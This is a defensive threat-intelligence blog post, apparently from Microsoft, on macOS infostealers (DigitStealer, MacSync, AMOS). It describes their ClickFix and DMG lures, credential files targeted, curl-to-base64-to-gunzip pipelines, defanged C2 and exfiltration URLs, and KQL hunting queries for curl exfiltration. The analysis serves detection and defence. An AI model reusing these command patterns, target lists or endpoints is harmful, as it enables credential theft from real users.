The “Hunting Infostealers” blog series covers the ever-evolving threat of infostealers. Infostealers have gone from simple credential theft to subscription-based threats (i.e., Malware-as-a-Service) driving modern cybercrime. Threat actors target sensitive information such as browser data, cookies, and session tokens that can later be used for account takeovers or to fuel data breaches, ransomware attacks, and supply chain attacks. In this blog series, Microsoft Defender Experts examine how modern infostealers operate across operating systems and delivery channels by blending into legitimate ecosystems and evading conventional defenses.

In this first part of the series, we highlight the rise of macOS-specific infostealers—including families such as DigitStealer, MacSync, and Atomic macOS (AMOS)—that abuse native utilities, user-initiated execution flows, and social-engineering techniques like “ClickFix” installers to harvest credentials and sensitive data. Throughout the blog, we map observed activity to Microsoft Defender XDR coverage and provide actionable guidance to help organizations detect, mitigate, and respond to infostealers.

macOS Threats

Since late 2025, Microsoft Defender Experts (DEX) has observed macOS targeted infostealer campaigns delivered through social engineering techniques, including ClickFix style prompts and malicious DMG downloads. These attacks rely on user interaction to initiate execution and are designed to steal credentials, session material, and infrastructure secrets that can enable account takeover, financial theft, and follow on compromise of cloud and developer resources. Once executed, the malware abuses trusted macOS functionality to collect a wide range of personal, financial, and enterprise related information. Stolen data can include browser authentication material, operating system credential stores, access keys used for cloud services, and artifacts commonly present on developer or administrator workstations. 

The potential impact of this threat extends beyond the infected device. Compromised credentials and session material can enable attackers to take over online accounts, access cloud and enterprise resources, steal cryptocurrency assets, and perform follow on intrusion activity without needing to maintain persistence on the original system. In organizational environments, this can lead to broader security incidents, including unauthorized access to internal services, cloud environments, or third-party platforms.

DigitStealer

In November 2025, Microsoft Defender Experts (DEX) identified a macOS infostealer campaign tracked as DigitStealer, delivered via a spoofed “DynamicLake” lure. The infection chain begins when users browse to a deceptive domain such as dynamiclake[.]org and download an unsigned disk image DynamicLake.dmg, then follow a “drag‑into‑Terminal” execution path that helps bypass Gatekeeper protections.

Dynamiclake[.]org landing page that delivers the unsigned disk image.

Once mounted, DigitStealer executes a Bash-based dropper that uses native tooling (notably curl) to retrieve staged payloads from Cloudflare Pages such as hxxps://b93b559cf522386018e24069ff1a8b7a[.]pages[.]dev/703d2315783f48c0563836f02a3421ed.aspx. In subsequent stages, the malware performs host profiling with system_profiler and uses AppleScript/JXA to drive credential theft and collection, staging artifacts in temporary locations (commonly under /tmp) before compressing content into ZIP archives for outbound transfer.

For exfiltration and C2, DigitStealer uses HTTPS POSTs to structured endpoints and API routes such as /api/grabber, /api/log, and /api/poll, where /api/poll is used for beaconing/tasking while upload routes handle stolen archives. Persistence is established via a macOS LaunchAgent, which can retrieve follow‑on instructions via DNS TXT records (observed use of dig + curl) and immediately execute newly fetched payloads via JXA.

In higher‑value (crypto‑focused) scenarios, DigitStealer targets wallet workflows including Ledger Live, and has been observed manipulating user friction and visibility by suppressing prompts (TCC-related behavior) and tampering with wallet application assets (e.g., Ledger Live.app.asar) to facilitate hijacking.

MacSync

In December 2025, Microsoft Defender Experts (DEX) identified a fileless macOS infostealer campaign referred to as MacSync Stealer, commonly delivered via malvertising and ClickFix-style lures that instruct users to copy/paste commands into Terminal rather than running a traditional installer. DEX has broadly observed these macOS-targeted infostealer campaigns delivered through ClickFix prompts and malicious DMG downloads in late 2025.

Webpage instructing users to copy and run a command in terminal

During observed MacSync activity, no standalone binaries are dropped. Instead, execution is driven by an in‑memory pipeline that invokes curl with TLS verification disabled, streaming the response directly through decoding/decompression (e.g., curl … | base64 -d | gunzip) without writing intermediate files to disk. This technique reduces disk artifacts and pushes detection toward process/network telemetry rather than file hashes.

MacSync then leverages osascript to indirectly invoke shell execution (e.g., sh -c) to blend into legitimate macOS automation, while harvesting a wide set of artifacts across browsers and credential stores. High‑signal targeted files include Chrome databases (Cookies / Login Data / Web Data), Firefox stores (cookies.sqlite / logins.json / key4.db /cert9.db), macOS Keychains (*.keychain-db), and developer/cloud secrets including SSH keys, AWS credentials, Kubernetes config files, plus shell history such as .zsh_history.(Observed in telemetry write‑up you provided.)

Staging and exfiltration are similarly low‑footprint: data is staged under /tmp using the pattern /tmp/sync[0-9]{7}, compressed using the built‑in ditto utility, and exfiltrated via HTTP POST to attacker infrastructure using a legitimate macOS browser user‑agent. Requests use custom headers (including an API key) to authenticate and manage tasking. Post‑exfiltration cleanup deletes staged directories, reinforcing the transient nature of the intrusion.

Atomic Stealer (AMOS)

In January 2026, Microsoft Defender Experts (DEX) observed active exploitation by Atomic macOS Stealer (AMOS), a highly automated and full‑featured macOS infostealer capable of progressing from initial user interaction to persistent command‑and‑control within minutes. Telemetry shows a modular, high‑throughput campaign optimized for credential harvesting, cryptocurrency theft, and long‑term operator control using exclusively native macOS tooling.

Initial access was achieved through redirect‑based delivery chains that guided victims through multiple intermediary domains—alliai[.]com and alli‑ai[.]pro—before downloading a malicious disk image (AlliAi.dmg) hosted on newly registered infrastructure (ai[.]foqguzz[.]com). Upon execution, the unsigned application launched under App Translocation, indicating execution from an untrusted path and effectively bypassing Gatekeeper enforcement.

Immediately after launch, the trojanized application executed its embedded binary (observed as FXSound) via xpcproxy, establishing outbound network connectivity to attacker‑controlled infrastructure (day.foqguzz[.]com) and spawning a staged Bash loader. The loader decoded and executed a Base64‑encoded script and used curl as an ingress tool transfer mechanism to retrieve next‑stage payloads from hxxp://217.119.139[.]117/d/dayd96331, completing a classic multi‑stage stager pattern.

Once staged, AMOS executed a large modular AppleScript payload via osascript, driving extensive system discovery and data collection. Harvested artifacts included macOS Keychains (for example ~/Library/Keychains/login.keychain‑db), browser credentials and session data from Chrome, Edge, Safari, and Firefox (including SafariCookies.binarycookies), Apple Notes databases, desktop and document files, and deep inspection of browser‑based cryptocurrency wallets through IndexedDB enumeration and targeted extension directory scanning. System metadata was collected via system_profiler to uniquely identify compromised hosts and support operator tasking.

Stolen data was staged under /tmp/17936/, compressed using the built‑in ditto utility into /tmp/out.zip, and exfiltrated via HTTP POST requests to hxxp://217.119.139[.]117/log. Exfiltration requests included custom headers—such as buildid, username, and cid—to uniquely identify victims and manage backend processing. AMOS incorporated retry logic and backoff mechanisms to ensure reliable data transfer before deleting local staging artifacts.

For persistence, AMOS installed a root‑level LaunchDaemon (for example /Library/LaunchDaemons/com.<random>.plist) that re‑executed a Base64‑decoded AppleScript payload at system startup. This established a botnet‑style polling loop to endpoints such as /api/v1/bot/joinsystem/<botid>/<macOS_version> and /api/v1/bot/actions/<botid>, enabling operators to issue commands including doshell, repeat, enablesocks5, and uninstall. The observed activity demonstrates a mature macOS stealer architecture optimized for stealth, scalability, and continuous remote control.

Shared Characteristics Across macOS Infostealer Campaigns

Despite differences in tooling and maturity, DigitStealer, MacSync Stealer, and Atomic macOS (AMOS) exhibit a converging macOS infostealer tradecraft driven by user‑initiated execution, fileless delivery, and deep abuse of native macOS frameworks. All three campaigns rely on social engineering—such as malvertising, redirect chains, or ClickFix‑style prompts—to coerce users into mounting unsigned DMGs or executing commands directly in Terminal, effectively bypassing Gatekeeper through explicit user action.

Payload delivery is predominantly fileless and multi‑stage, leveraging native utilities such as curl piped through Base64 decoding and decompression for in‑memory execution. Extensive use of AppleScript and JavaScript for Automation (JXA), alongside additional living‑off‑the‑land binaries (system_profiler, dscl, ditto, and shell interpreters), enables attackers to execute complex workflows while blending malicious activity into legitimate system automation.

All three campaigns aggressively harvest credentials and sensitive artifacts from browsers, macOS Keychains, and developer or cloud environments, while explicitly probing cryptocurrency wallets to prioritize financially valuable victims. Stolen data is staged temporarily (commonly under /tmp), compressed using built‑in archiving utilities, and exfiltrated via HTTP or HTTPS POST requests that mimic legitimate browser traffic, followed by immediate cleanup. Where persistence is required, campaigns rely on LaunchAgents or LaunchDaemons and dynamic tasking mechanisms (such as C2 polling or DNS‑based updates) to maintain access without redeployment.

Taken together, these behaviors highlight why macOS has become an increasingly attractive target: growing adoption in enterprise and developer environments, a rich set of built‑in automation and scripting capabilities that favor living‑off‑the‑land tradecraft, persistent user trust in installer and Terminal workflows, and the widespread presence of browser‑based and native cryptocurrency wallets on a single host. These factors have enabled the rise of scalable, high‑volume macOS infostealer ecosystems that rival traditional Windows‑centric campaigns in both sophistication and impact.

General macOS Infostealer Attack Chain

Mitigation and protection guidance

Microsoft recommends the following mitigations to reduce the impact of the macOS‑focused threats discussed in this report. These recommendations draw from established Defender blog guidance patterns and align with protections offered across Microsoft Defender XDR.

Organizations can follow these recommendations to mitigate threats associated with this threat:            

Strengthen user awareness & execution safeguards

• Educate users on social‑engineering lures, including malvertising redirect chains, fake installers, and ClickFix‑style copy‑paste prompts common across macOS stealer campaigns such as DigitStealer, MacSync, and AMOS.
• Discourage installation of unsigned DMGs or unofficial “terminal‑fix” utilities; reinforce safe‑download practices for consumer and enterprise macOS systems.

Harden macOS environments against native tool abuse

• Monitor for suspicious Terminal activity—especially execution flows involving curl, Base64 decoding, gunzip, osascript, or JXA invocation, which appear across all three macOS stealers.
• Detect patterns of fileless execution, such as in‑memory pipelines using curl | base64 -d | gunzip, or AppleScript‑driven system discovery and credential harvesting.
• Leverage Defender’s custom detection rules to alert on abnormal access to Keychain, browser credential stores, and cloud/developer artifacts, including SSH keys, Kubernetes configs, AWS credentials, and wallet data.

Control outbound traffic & staging behavior

• Inspect network egress for POST requests to newly registered or suspicious domains—a key indicator for DigitStealer, MacSync, and AMOS.
• Detect transient creation of ZIP archives under /tmp or similar ephemeral directories, followed by outbound exfiltration attempts.
• Block direct access to known C2 infrastructure where possible, informed by your organization’s threat‑intelligence sources.

Microsoft also recommends the following mitigations to reduce the impact of this threat.

• Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats.
• Run EDR in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
• Enable real-time protection for macOS in Microsoft Defender Antivirus.
• Enable real-time behavior monitoring for macOS in Microsoft Defender Antivirus.
• Enable network protection for macOS in Microsoft Defender for Endpoint.
• Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
• Allow investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
• Turn on tamper protection features to prevent attackers from stopping security services. Combine tamper protection with the DisableLocalAdminMerge setting to prevent attackers from using local administrator privileges to set antivirus exclusions.

Microsoft Defender XDR detections   

Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.

Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.

 

Threat intelligence reports

Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.

Microsoft Defender XDR Threat analytics 

• From ClickFix to code signed: the quiet shift of MacSync Stealer malware
• MacSync infostealer campaigns leverage social engineering

Hunting queries 

Microsoft Defender XDR

Microsoft Defender XDR customers can run the following queries to find related activity in their networks:

Use the following queries to identify activity related to DigitStealer

// Identify suspicious DynamicLake disk image (.dmg) mounting
DeviceProcessEvents
| where FileName has_any ('mount_hfs', 'mount')
| where ProcessCommandLine has_all ('-o nodev' , '-o quarantine')
| where ProcessCommandLine contains '/Volumes/Install DynamicLake'

 

// Identify data exfiltration to DigitStealer C2 API endpoints.
DeviceProcessEvents
| where InitiatingProcessFileName has_any ('bash', 'sh')
| where ProcessCommandLine has_all ('curl', '--retry 10')
| where ProcessCommandLine contains 'hwid='
| where ProcessCommandLine endswith "api/credentials"
        or ProcessCommandLine endswith "api/grabber"
        or ProcessCommandLine endswith "api/log"
| extend APIEndpoint = extract(@"/api/([^\s]+)", 1, ProcessCommandLine)

 

Use the following queries to identify activity related to MacSync

// Identify exfiltration of staged data via curl
DeviceProcessEvents
| where InitiatingProcessFileName =~ "zsh" and FileName =~ "curl"
| where ProcessCommandLine has_all ("curl -k -X POST -H", "api-key: ", "--max-time", "-F file=@/tmp/", ".zip", "-F buildtxd=")

 

Use the following queries to identify activity related to Atomic Stealer (AMOS)

// Identify suspicious AlliAi disk image (.dmg) mounting
DeviceProcessEvents
| where FileName has_any ('mount_hfs', 'mount')
| where ProcessCommandLine has_all ('-o nodev', '-o quarantine')
| where ProcessCommandLine contains '/Volumes/ALLI'

Indicators of compromise

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. 

References

MacSync Stealer Evolves: From ClickFix to Code-Signed Swift Malware — Jamf Threat Labs

Learn more  

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn, X (formerly Twitter), and Bluesky.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.